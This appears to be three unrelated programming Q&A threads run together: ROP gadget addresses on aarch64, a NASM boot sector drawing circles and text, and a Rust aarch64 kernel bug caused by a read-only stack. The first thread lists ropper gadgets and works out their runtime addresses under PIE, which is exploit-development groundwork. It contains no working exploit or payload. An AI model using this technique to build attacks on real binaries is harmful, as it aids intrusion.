0x00000000000006c4: ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17;
0x00000000000006d4: ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17;
0x00000000000006e4: ldr x17, [x16, #0x30]; add x16, x16, #0x30; br x17;
0x0000000000000668: ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000694: ldr x17, [x16, #8]; add x16, x16, #8; br x17;
0x0000000000000684: ldr x17, [x16]; add x16, x16, #0; br x17;
0x00000000000007ec: ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000798: ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16;
0x0000000000000798: ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; ret;
0x00000000000008d8: ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x00000000000008e8: mov w0, w22; blr x3;
0x00000000000008e4: mov x1, x23; mov w0, w22; blr x3;
0x0000000000000764: mov x16, x1; br x16;
0x0000000000000764: mov x16, x1; br x16; ret;
0x00000000000007a0: mov x16, x2; br x16;
0x00000000000007a0: mov x16, x2; br x16; ret;
0x00000000000008dc: mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x0000000000000644: mov x29, sp; bl #0x728; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000918: mov x29, sp; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000880: movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x00000000000007e4: movz w0, #0x1; strb w0, [x19, #0x48]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000660: stp x16, x30, [sp, #-0x10]!; adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000640: stp x29, x30, [sp, #-0x10]!; mov x29, sp; bl #0x728; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000914: stp x29, x30, [sp, #-0x10]!; mov x29, sp; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000874: str w0, [sp, #0x1c]; str x1, [sp, #0x10]; bl #0x83c; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000878: str x1, [sp, #0x10]; bl #0x83c; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x00000000000007e8: strb w0, [x19, #0x48]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x000000000000067c: nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x0000000000000830: nop; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000860: nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000678: nop; nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x000000000000090c: nop; ret;
0x0000000000000650: ret;
In particular i am interested in both 0x00000000000008f8 and 0x00000000000008d8 gadgets.
Elf file type is DYN (Shared object file)
Entry point 0x6f0
There are 9 program headers, starting at offset 64
The output of the command readelf -l to find the base address of ELF file is:
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x00000000000001f8 0x00000000000001f8 R 0x8
INTERP 0x0000000000000238 0x0000000000000238 0x0000000000000238
0x000000000000001b 0x000000000000001b R 0x1
[Requesting program interpreter: /lib/ld-linux-aarch64.so.1]
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000adc 0x0000000000000adc R E 0x10000
LOAD 0x0000000000000db8 0x0000000000010db8 0x0000000000010db8
0x0000000000000290 0x0000000000000298 RW 0x10000
DYNAMIC 0x0000000000000dc8 0x0000000000010dc8 0x0000000000010dc8
0x00000000000001e0 0x00000000000001e0 RW 0x8
NOTE 0x0000000000000254 0x0000000000000254 0x0000000000000254
0x0000000000000044 0x0000000000000044 R 0x4
GNU_EH_FRAME 0x0000000000000960 0x0000000000000960 0x0000000000000960
0x0000000000000054 0x0000000000000054 R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
GNU_RELRO 0x0000000000000db8 0x0000000000010db8 0x0000000000010db8
0x0000000000000248 0x0000000000000248 R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
03 .init_array .fini_array .dynamic .got .got.plt .data .bss
04 .dynamic
05 .note.gnu.build-id .note.ABI-tag
06 .eh_frame_hdr
07
08 .init_array .fini_array .dynamic .got
and the output of the info proc mappings in gdb is:
Start Addr End Addr Size Offset objfile
0x5555555000 0x5555556000 0x1000 0x0 path_to _binary/binary_name
0x5555565000 0x5555566000 0x1000 0x0 path_to _binary/binary_name
0x5555566000 0x5555567000 0x1000 0x1000 path_to _binary/binary_name
0x7ff7e44000 0x7ff7fa1000 0x15d000 0x0 /usr/lib/aarch64-linux-gnu/libc-2.31.so
0x7ff7fa1000 0x7ff7fb1000 0x10000 0x15d000 /usr/lib/aarch64-linux-gnu/libc-2.31.so
0x7ff7fb1000 0x7ff7fb4000 0x3000 0x15d000 /usr/lib/aarch64-linux-gnu/libc-2.31.so
0x7ff7fb4000 0x7ff7fb7000 0x3000 0x160000 /usr/lib/aarch64-linux-gnu/libc-2.31.so
0x7ff7fb7000 0x7ff7fba000 0x3000 0x0
0x7ff7fcc000 0x7ff7fed000 0x21000 0x0 /usr/lib/aarch64-linux-gnu/ld-2.31.so
0x7ff7ff9000 0x7ff7ffb000 0x2000 0x0
0x7ff7ffb000 0x7ff7ffc000 0x1000 0x0 [vvar]
0x7ff7ffc000 0x7ff7ffd000 0x1000 0x0 [vdso]
0x7ff7ffd000 0x7ff7ffe000 0x1000 0x21000 /usr/lib/aarch64-linux-gnu/ld-2.31.so
0x7ff7ffe000 0x7ff8000000 0x2000 0x22000 /usr/lib/aarch64-linux-gnu/ld-2.31.so
0x7ffffdf000 0x8000000000 0x21000 0x0 [stack]
How can i find out where the gadgets are actually loaded in memory ? Is that the issue ? What ropper is reporting ?
Your gadget is at 0x55555558f8.
Ropper shows the addresses of gadgets the way the ELF header describes the memory layout of the binary. According to that header:
The file contents 0x0-0xadc are to be mapped as r-x at address 0x0.
The file contents 0xdb8-0x1048 are to be mapped as rw- at address 0x10db8.
Account for page boundaries and you get one page mapping file offset 0x0 to address 0x0 as executable and two pages mapping file offset 0x0 to address 0x10000 as writeable.
From your GDB dump, these mappings are created at 0x5555555000 and 0x5555565000 in the live process, respectively.

Bootloader with text and graphics ...howto ?( with nasm )

Below i have a code that draw 3 circles in 3 different colors.. that is fine..
but how do i addmit a text string ? Thx.
I did some tests on virtualbox (windows), but no luck..
Any ideas to get it worked ?.
BITS 16
ORG 100h
push 0a000h ;Video memory graphics segment
pop es
mov ax, 0013h ;320x200#8bpp
int 10h
push 0Eh ;Blue
push 10 ;cX
push 10 ;cY
push 10 ;Radius
call drawFilledCircle
push 02h ;Blue
push 40 ;cX
push 40 ;cY
push 30 ;Radius
call drawFilledCircle
push 06h ;Blue
push 140 ;cX
push 100 ;cY
push 70 ;Radius
call drawFilledCircle
;Wait for a key
xor ah, ah
int 16h
loc db "KERNEL IMG"
.LOOP:
push cx
mov cx, 0x000B ; eleven character name
mov si, loc
; image name to find
push di
rep cmpsb ; test for entry match
pop di
;je LOAD_FAT
pop cx
add di, 0x0020 ; queue next directory entry
loop .LOOP
;jmp FAILURE
;Restore text mode
mov ax, 0003h
int 10h
;Return
mov ax, 4c00h
int 21h
;Color
;cX
;cY
;R
drawFilledCircle:
push bp
mov bp, sp
sub sp, 02h
mov cx, WORD [bp+04h] ;R
mov ax, cx
mul ax ;AX = R^2
mov WORD [bp-02h], ax ;[bp-02h] = R^2
mov ax, WORD [bp+06h]
sub ax, cx ;i = cY-R
mov bx, WORD [bp+08h]
sub bx, cx ;j = cX-R
shl cx, 1
mov dx, cx ;DX = Copy of 2R
.advance_v:
push cx
push bx
mov cx, dx
.advance_h:
;Save values
push bx
push ax
push dx
;Compute (i-y) and (j-x)
sub ax, WORD [bp+06h]
sub bx, WORD [bp+08h]
mul ax ;Compute (i-y)^2
push ax
mov ax, bx
mul ax
pop bx ;Compute (j-x)^2 in ax, (i-y)^2 is in bx now
add ax, bx ;(j-x)^2 + (i-y)^2
cmp ax, WORD [bp-02h] ;;(j-x)^2 + (i-y)^2 <= R^2
;Restore values before jump
pop dx
pop ax
pop bx
ja .continue ;Skip pixel if (j-x)^2 + (i-y)^2 > R^2
;Write pixel
push WORD [bp+0ah]
push bx
push ax
call writePx
.continue:
;Advance j
inc bx
loop .advance_h
;Advance i
inc ax
pop bx ;Restore j
pop cx ;Restore counter
loop .advance_v
add sp, 02h
pop bp
ret 08h
;Color
;X
;Y
writePx:
push bp
mov bp, sp
push ax
push bx
mov bx, WORD [bp+04h]
mov ax, bx
shl bx, 6
shl ax, 8
add bx, ax ;320 = 256 + 64
add bx, WORD [bp+06h]
mov ax, WORD [bp+08h]
;TODO: Clip
mov BYTE [es:bx], al
pop bx
pop ax
pop bp
ret 06h
times 510-($-$$) db 0 ; Fill the rest with zeros
dw 0xAA55 ; Boot loader signature
but how do i addmit a text string ?
You've decided to use the 320x200 256 colors video mode 13h.
To output text you can use every BIOS function that deals with text output, just like you would do on a text video screen.
This video mode uses an 8x8 font and so you can position the cursor at any of the 40x25=1000 character cells.
Example of writing a red colored capital B at the center of the screen:
mov dx, 0C14h ;DH=12 row, DL=20 column
mov bh, 0 ;BH=0 display page
mov ah, 02h ;AH=02h set cursor position function
int 10h ;video BIOS interrupt
mov bx, 000Ch ;BH=0 display page, BL=12 red
mov ax, 0E42h ;AH=0Eh teletype function, AL=66 capital B
int 10h ;video BIOS interrupt
BITS 16
[ORG 0x7C00]
;ORG 100h
push 0a000h ;Video memory graphics segment
pop es
mov ax, 0013h ;320x200#8bpp
int 10h
push 0Eh ;Blue
push 10 ;cX
push 10 ;cY
push 10 ;Radius
call drawFilledCircle
push 02h ;Blue
push 40 ;cX
push 40 ;cY
push 30 ;Radius
call drawFilledCircle
push 06h ;Blue
push 140 ;cX
push 100 ;cY
push 70 ;Radius
call drawFilledCircle
;Wait for a key
;xor ah, ah
;int 16h
main: ; Label for the start of the main program
mov ax,0x0000 ; Setup the Data Segment register
; Location of data is DS:Offset
mov ds,ax ; This can not be loaded directly it has to be in two steps.
; 'mov ds, 0x0000' will NOT work due to limitations on the CPU
mov si, HelloWorld ; Load the string into position for the procedure.
call PutStr ; Call/start the procedure
;jmp $ ; Never ending loop
; Procedures
PutStr: ; Procedure label/start
; Set up the registers for the interrupt call
mov ah,0x0E ; The function to display a chacter (teletype)
mov bh,0x00 ; Page number
mov bl,0x07 ; Normal text attribute
.nextchar ; Internal label (needed to loop round for the next character)
lodsb ; I think of this as LOaD String Block
; (Not sure if thats the real meaning though)
; Loads [SI] into AL and increases SI by one
; Check for end of string '0'
or al,al ; Sets the zero flag if al = 0
; (OR outputs 0's where there is a zero bit in the register)
jz .return ; If the zero flag has been set go to the end of the procedure.
; Zero flag gets set when an instruction returns 0 as the answer.
int 0x10 ; Run the BIOS video interrupt
jmp .nextchar ; Loop back round tothe top
.return ; Label at the end to jump to when complete
; ret ; Return to main program
;Wait for a key
xor ah, ah
int 16h
push 01h ;Blue
push 100 ;cX
push 90 ;cY
push 140 ;Radius
call drawFilledCircle
;ret
; Data
HelloWorld db ' WELCOME !! Press Enter ',10,10,0
loc db "KERNEL IMG"
.LOOP:
push cx
mov cx, 0x000B ; eleven character name
mov si, loc
; image name to find
push di
rep cmpsb ; test for entry match
pop di
;je LOAD_FAT
pop cx
add di, 0x0020 ; queue next directory entry
loop .LOOP
;jmp FAILURE
;Restore text mode
mov ax, 0003h
int 10h
;Return
mov ax, 4c00h
int 21h
;Color
;cX
;cY
;R
drawFilledCircle:
push bp
mov bp, sp
sub sp, 02h
mov cx, WORD [bp+04h] ;R
mov ax, cx
mul ax ;AX = R^2
mov WORD [bp-02h], ax ;[bp-02h] = R^2
mov ax, WORD [bp+06h]
sub ax, cx ;i = cY-R
mov bx, WORD [bp+08h]
sub bx, cx ;j = cX-R
shl cx, 1
mov dx, cx ;DX = Copy of 2R
.advance_v:
push cx
push bx
mov cx, dx
.advance_h:
;Save values
push bx
push ax
push dx
;Compute (i-y) and (j-x)
sub ax, WORD [bp+06h]
sub bx, WORD [bp+08h]
mul ax ;Compute (i-y)^2
push ax
mov ax, bx
mul ax
pop bx ;Compute (j-x)^2 in ax, (i-y)^2 is in bx now
add ax, bx ;(j-x)^2 + (i-y)^2
cmp ax, WORD [bp-02h] ;;(j-x)^2 + (i-y)^2 <= R^2
;Restore values before jump
pop dx
pop ax
pop bx
ja .continue ;Skip pixel if (j-x)^2 + (i-y)^2 > R^2
;Write pixel
push WORD [bp+0ah]
push bx
push ax
call writePx
.continue:
;Advance j
inc bx
loop .advance_h
;Advance i
inc ax
pop bx ;Restore j
pop cx ;Restore counter
loop .advance_v
add sp, 02h
pop bp
ret 08h
;Color
;X
;Y
writePx:
push bp
mov bp, sp
push ax
push bx
mov bx, WORD [bp+04h]
mov ax, bx
shl bx, 6
shl ax, 8
add bx, ax ;320 = 256 + 64
add bx, WORD [bp+06h]
mov ax, WORD [bp+08h]
;TODO: Clip
mov BYTE [es:bx], al
pop bx
pop ax
pop bp
ret 06h
times 510-($-$$) db 0 ; Fill the rest with zeros
dw 0xAA55 ; Boot loader signature

Rustc/LLVM generates faulty code for aarch64 with opt-level=0

I have two files which are assembled/compiled/linked into minimalistic kernel.
start.s:
.set CPACR_EL1_FPEN, 0b11 << 20
.set BOOT_STACK_SIZE, 8 * 1024
.global __boot_stack
.global __start
.global __halt
.bss
.align 16
__boot_stack:
.fill BOOT_STACK_SIZE
.text
__start:
/* disable FP and SIMD traps */
mov x0, #CPACR_EL1_FPEN
msr cpacr_el1, x0
/* set stack */
adr x0, __boot_stack
add sp, x0, #BOOT_STACK_SIZE
/* call the Rust entry point */
bl __boot
__halt:
/* halt CPU */
wfi
b __halt
boot.rs:
#[no_mangle]
pub extern fn __boot() {
unsafe {
let ptr = 0x9000000 as *mut u8;
*ptr = '!' as u8;
}
}
For opt-level=3 the resulting code outputs single '!' to a serial port (as was intended). For opt-level=0 I have a strange infinite loop (e.g. '!!!!!!!!!....'). Here is the disassembled dump of the problematic code:
0000000000000000 <__kernel_begin>:
0: d2a00600 mov x0, #0x300000 // #3145728
4: d5181040 msr cpacr_el1, x0
8: 100007c0 adr x0, 100 <__boot_stack>
c: 9140081f add sp, x0, #0x2, lsl #12
10: 94000003 bl 1c <__boot>
0000000000000014 <__halt>:
14: d503207f wfi
18: 17ffffff b 14 <__halt>
000000000000001c <__boot>:
1c: a9bf7bfd stp x29, x30, [sp,#-16]!
20: 910003fd mov x29, sp
24: 94000003 bl 30 <aarch64::boot::__boot::__rust_abi>
28: a8c17bfd ldp x29, x30, [sp],#16
2c: d65f03c0 ret
0000000000000030 <aarch64::boot::__boot::__rust_abi>:
30: d10043ff sub sp, sp, #0x10
34: 52a12008 mov w8, #0x9000000 // #150994944
38: 2a0803e9 mov w9, w8
3c: f90007e9 str x9, [sp,#8]
40: 52800428 mov w8, #0x21 // #33
44: 39000128 strb w8, [x9]
48: 910043ff add sp, sp, #0x10
4c: d65f03c0 ret
The code is tested using qemu-system-aarch64. I don't see serious problems with it (except redundancy). Can you suggest a possible cause of such abnormal behaviour?
P.S. This is the optimised version which works properly:
0000000000000000 <__kernel_begin>:
0: d2a00600 mov x0, #0x300000 // #3145728
4: d5181040 msr cpacr_el1, x0
8: 1007ffc0 adr x0, 10000 <__boot_stack>
c: 9140081f add sp, x0, #0x2, lsl #12
10: 94000003 bl 1c <__boot>
0000000000000014 <__halt>:
14: d503207f wfi
18: 17ffffff b 14 <__halt>
000000000000001c <__boot>:
1c: 52a12008 mov w8, #0x9000000 // #150994944
20: 52800429 mov w9, #0x21 // #33
24: 39000109 strb w9, [x8]
28: d65f03c0 ret
I've succeeded to run the non-optimised code without abnormalities. Thanks to Notlikethat for the idea. My stack was just mapped into readonly memory.
So I've just added the offset statement into my linker script (". = 1024M;") in order to make all the symbols to start from 1GiB (where RAM begins). After this modification the code started to work properly.

Resources